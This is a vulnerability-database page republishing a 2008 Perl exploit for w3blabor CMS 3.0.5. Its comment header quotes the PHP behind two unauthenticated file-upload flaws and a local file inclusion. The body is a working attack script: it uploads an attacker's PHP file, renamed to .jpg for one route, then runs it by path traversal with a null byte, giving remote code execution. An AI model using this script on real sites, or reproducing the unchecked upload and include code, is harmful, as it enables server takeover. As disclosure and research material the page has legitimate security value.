Vulners
Lucene search
w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;
# \#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2oo8 |
# --------------------------------------------------
# | w3blabor v3.0.5 Arbitrary File Upload & LFI |
# --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3blaborcms.de
# [!] Detected...: 17.10.2008
# [!] Reported...: 29.11.2008
# [!] Response...: xx.xx.2008
#
# [!] Background.: Sicher! Schnell! Einfach!
# Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
# abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
# angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
# Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
# es zu etwas Besonderem!
#
# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges)
#
# 71: if (isset($_GET['action']) && $_GET['action'] == "upload") {
#
# 80: $dir = "../../includes/media";
# 81: $file = $_FILES['datei']['name'];
#
# 92: $file = strtolower($file);
# 93:
# 94: move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file);
# 95: @chmod("".$dir.""/"".$file."", 0777);
#
# [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges)
#
# 45: $neueslogo = $_FILES['neueslogo']['name'];
# 46: $logopfad = "../../includes/upload/".$settings['page_logo']."";
# 47:
# 48: $endung = substr ($_FILES['neueslogo']['name'], -3);
# 49:
# 50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) {
#
# 54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo);
#
# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off)
#
# 43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
# 44:
# 45: if (file_exists($modulfile)) {
# 46:
# 47: include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
#
# [!] Solution...: no update from vendor till now
#
if(!$ARGV[4])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ----------------oOO---(_)---OOo----------------";
print "\n | w3blabor v3.0.5 Arbitrary File Upload & LFI |";
print "\n | coded by DNX |";
print "\n -----------------------------------------------";
print "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>";
print "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg";
print "\n[!] Targets:";
print "\n -1 Upload over media.inc.php";
print "\n -2 Upload over meinlogo.inc.php";
print "\n[!] Options:";
print "\n[!] -f [filename] Path to local file with php code";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $file = "";
my %options = ();
GetOptions(\%options, "1", "2", "f=s", "p=s");
if($options{"f"})
{
$file = $options{"f"};
if(!-e $file)
{
print "[!] Failed, local file doesn't exist.\n";
exit;
}
}
else
{
print "[!] Failed, see usage.\n";
exit;
}
print "[!] Exploiting...\n";
use_bug($host, $path, $file);
print "[!] Exploit done\n";
sub use_bug
{
my $host = shift;
my $path = shift;
my $file = shift;
my $ua = LWP::UserAgent->new();
my $url = "";
my $url2 = "";
my $req = "";
$file =~ /.*[\/|\\](.*)/;
my $filename = $1;
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
if($options{"1"})
{
$url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload';
$url2 = 'http://'.$host.$path.'includes/media/'.$filename;
$req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ];
}
if($options{"2"})
{
if($file =~ m/.*\.jpg|peg|png|gif/i)
{
$url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload';
$url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00';
$req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ];
}
else
{
print "[!] Failed, rename your local file to .jpg\n";
exit;
}
}
$ua->request($req);
my $res = $ua->get($url2);
if($res->is_success)
{
print "[!] File uploaded\n";
print "[!] Check your file @ ".$url2."\n";
}
else
{
print "[!] Failed\n";
}
}
# milw0rm.com [2008-12-07]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1